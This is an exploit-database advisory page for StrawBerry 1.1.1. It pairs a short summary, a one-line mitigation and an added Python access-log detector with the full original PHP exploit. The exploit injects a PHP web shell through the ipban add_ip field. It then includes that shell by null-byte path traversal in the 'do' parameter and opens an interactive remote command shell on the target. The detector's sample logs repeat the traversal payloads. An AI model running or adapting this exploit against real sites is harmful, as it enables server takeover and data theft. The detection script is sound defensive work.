Vendor: StrawBerry
By: [AVT]
CVSS: 9,3 (HIGH)
Vulnerability: Local File Inclusion (LFI) and Remote Command Execution (RCE)
CWE: 94
Product Name: StrawBerry
Affected Version From: 1.1.1
Affected Version To: 1.1.1
Patch Exists: NO
Related CWE: N/A
CPE: strawberry:strawberry:1.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

StrawBerry 1.1.1 LFI / Remote Command Execution Exploit

This exploit targets the StrawBerry 1.1.1 web application by combining Local File Inclusion (LFI) with Remote Command Execution (RCE). It sends a POST request to the vulnerable application with malicious code in the comment field (in the code below, the add_ip parameter of the ipban module). The application then executes that code when the file holding it is included through the do parameter of example/index.php, allowing the attacker to gain access to the application. The exploit header lists magic_quotes_gpc = Off as a precondition.

Mitigation:

Mitigate this vulnerability by properly validating user input and using secure coding practices, so that the application is no longer exposed to LFI and RCE attacks.
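
A detection check for the request shape this page's proof-of-concept relies on, as an added example that is not part of the original advisory or of StrawBerry: it scans access-log lines for a do parameter that contains a traversal segment or a null byte, or that fails an allowlist. The allowlist pattern and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate values of `do` are short page names made of letters,
# digits, '_' and '-'. Adjust to the names your installation really uses.
SAFE_DO = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def do_param_findings(value):
    """Return the reasons a decoded `do` value is unsafe as an include name."""
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("path-traversal")
    if not reasons and not SAFE_DO.fullmatch(value):
        reasons.append("not-allowlisted")
    return reasons


def scan_log(lines):
    """Yield (line_number, method, path, reasons) for each suspicious request."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        # parse_qs percent-decodes once; decode again to catch %252e%252e etc.
        for raw in parse_qs(target.query, keep_blank_values=True).get("do", []):
            reasons = do_param_findings(unquote(raw))
            if reasons:
                yield number, match.group("method"), target.path, reasons


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/May/2009:10:00:01 +0000] "GET /news/example/index.php?do=archive HTTP/1.1" 200 5120',
    '192.0.2.66 - - [14/May/2009:10:02:17 +0000] "GET /news/example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1" 200 812',
    '192.0.2.66 - - [14/May/2009:10:02:18 +0000] "POST /news/example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1" 200 640',
    '192.0.2.11 - - [14/May/2009:10:03:40 +0000] "GET /news/example/index.php?do=%252e%252e/config HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same do_param_findings check, applied to the parameter before it reaches an include, is the input validation the mitigation calls for.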

Exploit-DB raw data:

<?php

/*********************************************************************
 * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit           *
 * Site: http://strawberry.goodgirl.ru/                              *
 *********************************************************************
 * magic_quotes_gpc = Off                                            *
 *********************************************************************
 * Author: [AVT]                                                     *
 * Date : 10.05.09                                                   *
 * My Site: http://antichat.ru/                                      *
 *********************************************************************/
set_time_limit(0);
error_reporting(0);
list($cli,$host,$path) = $argv;

if ($argc != 3) {  
    
    print "\no-------------------------------------------------------------o\n";
    print "\r|   StrawBerry 1.1.1 LFI / Remote Command Execution Exploit   |\n";
    print "\r|           Site: http://strawberry.goodgirl.ru/              |\n";
    print "\ro-------------------------------------------------------------o\n";
    print "\r| Author: [AVT]                                               |\n";
    print "\r| My Site: http://antichat.ru/                                |\n";
    print "\ro-------------------------------------------------------------o\n";
    print "\r| Usage:   php expl.php [host] [path]                         |\n";
    print "\r| host     localhost                                          |\n";
    print "\r| path     /news/                                             |\n";
    print "\r| Example: php expl.php site.com /news/                       |\n";
    print "\ro-------------------------------------------------------------o\n";
    exit;      
}         
if (check_host ())
	{
	post_shell();
	}
use_shell();

function check_host ()
	{
	global $host,$path;
	$data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n";
	$data .= "Host: $host\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html = send ($host,$data);
    	if (!stristr($html,'a:')) 
		{
		print "\ro-------------------------------------------------------------o\n";
		print "\r| Exploit Failed!                                             |\n";
		print "\ro-------------------------------------------------------------o\n";
		exit;
    		}
	elseif (stristr($html,'<code>'))
		{
		return false;
    		}
	else
		{
		return true;
		}
	}


function send ($host,$data) 
	{
	if (!$sock = @fsockopen($host,80)) 
		{
		die("Connection refused, try again!\n");
    		}   	
	fputs($sock,$data);
	$html = '';
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
	}

function post_shell() 
	{
	global $host,$path;
	$post  = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban";
	$data  = "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1\r\n";
	$data .= "Host: $host\r\n";
	$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
	$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$data .= "Content-Length: ".strlen($post)."\r\n\r\n";
	$data .= "$post\r\n\r\n";
	send ($host,$data);
	}


function use_shell()
	{
    	while (1) 
		{
        	echo "[Shell]~$: "; 
        	$cmd = stripslashes(trim(fgets(STDIN)));  
        	if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("\nExited\n");
        	print exec_cmd($cmd);     
		}
	}


function exec_cmd($cmd) 
	{
	global $host,$path;

	$cmd = base64_encode($cmd);
	$data  = "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n";
	$data .= "Host: $host\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html = send ($host,$data);
	preg_match_all('/<code>(.*)<\/code>/si', $html, $match);
	return $match[1][0];
	}

?>

# milw0rm.com [2009-05-14]